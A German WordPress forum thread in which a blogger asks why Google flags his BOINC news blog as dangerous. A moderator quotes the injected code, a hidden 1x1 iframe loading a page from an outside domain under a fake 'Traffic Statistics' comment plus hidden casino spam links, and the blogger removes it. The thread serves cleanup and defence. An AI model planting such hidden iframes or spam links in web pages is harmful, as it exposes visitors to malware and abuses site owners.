| |||||||
| Registrieren | Hilfe | Benutzerliste | Suchen | Heutige Beiträge | Alle Foren als gelesen markieren | Threads ohne Antworten |
![]() |
| | Themen-Optionen | Ansicht |
| | #1 (permalink) |
| PostRank: 0 ![]() Registriert seit: 16.02.2008 Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
| Bei Google als "Gefährliche Seite" gesperrt Ich bin freier Mitarbeiter beim BOINC Projekt "Spinhenge@Home" und leite das BOINC Info-, Hilfe- und Userteam "Crunching-Family.at". Als Infofeature betreibe ich seit ca. 1 Jahr den "BOINC Blog" Dort werden nur die News von BOINC und den Projekten ins deutsche übersetzt und veröffentlicht. Ich benutze WP Vers. 2.1.2. Nach der Installation habe ich ausser ein paar Plugins nichts mehr verändert, auch keine Updates gemacht. (ich habe keine Ahnung von Servern, Datenbänken etc...) Bisher lief alles Bestens. Letzte Woche bekam ich eine Email von Google das mein Blog künftig mit einem besonderen Gefahrenvermerk versehen ist weil er eine Gefahr für Besucher darstellt (oder Ähnlich). Ich dachte erst an eine gefakte Mail und habe einfach nach "BOINC Blog" gegooglet. Auf der Ergebnisseite der Anfrage steht mein Blog auch an erster Stelle, aber mit folgendem Vermerk: "Diese Website kann Ihren Computer beschädigen." Geht es anderen Blogs ähnlich? Warum kann mein Blog jetzt plötzlich (angeblich) andere Computer beschädigen und was kann ich dagegen unternehmen? Kann mir bitte jemand weiterhelfen? Mit Dank und Gruss Miko |
| | |
| | #3 (permalink) |
| WPD-Team ![]() Registriert seit: 20.08.2005 Ort: Berlin
Beiträge: 10.526
| Ansonsten wäre es bei einer veralteten WP-Version nicht undenkbar, dass Schadcode in deinen Blog geschleust wurde. Aber wie schon gesagt ist das eine Sache, die du mit Google klären musst.
__________________ Wordpress FAQ (Häufig gestellte Fragen) | Themepool"Eine gut gestellte Frage ist schon halb beantwortet." |
| | |
| | #4 (permalink) |
| PostRank: 0 ![]() Registriert seit: 18.02.2008
Beiträge: 2
| Das Problem hatte ich auch.Einfach ne Mail an Google geschrieben und schon hat sich das geklärt
__________________ Free SMS ohne Anmeldung auf www.Biepmaz.de |
| | |
| | #5 (permalink) |
| PostRank: 0 ![]() Registriert seit: 16.02.2008 Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
| Ich hab mal ne email geschickt, den sachverhalt erklährt und um ggfs neue Prüfung und Aufhebung des Sperrvermerks gebeten. Das Problem dabei war das ich keine vernünftige Emailadresse hatte... (Die Google Benachrichtigung kam von "noreturn@google.com") Also hab ich die Mail an 8 ausgedachte Adressen wie support@google.com, info@google.com, security@google.com usw geschickt... Ein paar waren nicht zustellbar, der Rest ist angekommen. Ich bin echt gespannt obs was hilft! Ich werde Euch hier auf dem Laufenden halten! DANKE für den Email-Tipp! Gruss Miko |
| | |
| | #7 (permalink) | |
| PostRank: 4 ![]() Registriert seit: 01.08.2006
Beiträge: 154
| Schau mal hier: How can I find out if my site has been identified as a web site that hosts or distributes malicious software and what can I do if it has? Zitat:
__________________ Lustige Erlebnisse mit der Deutschen Bahn | |
| | |
| | #8 (permalink) |
| WPD-Moderator ![]() Registriert seit: 31.05.2005 Ort: Gera Ghetto
Beiträge: 2.140
| Der Schadcode ist folgender: Code: <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> <noscript>Ein Bluff beimm <a href="http://www.edsab.com">online poker</a> fliegt also nicht auf.</noscript><noscript>Sie bieten eine enorme Wahl aus allen popularen <a href="http://www.eigeneer.com">casino</a>.</noscript> |
| | |
| | #9 (permalink) | |
| PostRank: 0 ![]() Registriert seit: 16.02.2008 Ort: Hägerau / Lechtal / Tirol
Beiträge: 6
| Zitat:
! ! ! DANKE ! ! ! Ich habe den und einen ähnlichen Code unter 2 meiner Beiträge gefunden.Beide sind gelöscht Mein Admin PW ist geändert und ich habe die Userrechte stark eingeschränkt. Dann habe ich den von "Lim_Dul" beschriebenen Weg benutzt und den Blog zur erneuten Überprüfung angemeldet. (das soll leider "etwas" dauern...) Hoffentlich hilfts! Ich halte Euch auf dem Laufenden. Gruss Miko | |
| | |
![]() |
| Themen-Optionen | |
| Ansicht | |
| |